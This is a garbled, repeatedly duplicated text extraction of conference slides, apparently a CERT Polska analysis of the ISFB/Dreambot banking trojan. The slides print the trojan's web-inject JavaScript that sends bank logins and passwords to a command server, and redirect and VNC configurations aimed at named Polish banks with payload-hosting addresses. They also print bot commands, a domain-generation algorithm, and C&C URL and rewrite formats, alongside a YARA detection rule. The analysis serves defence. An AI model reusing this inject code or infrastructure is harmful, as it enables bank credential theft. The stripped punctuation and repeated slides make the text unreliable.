02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
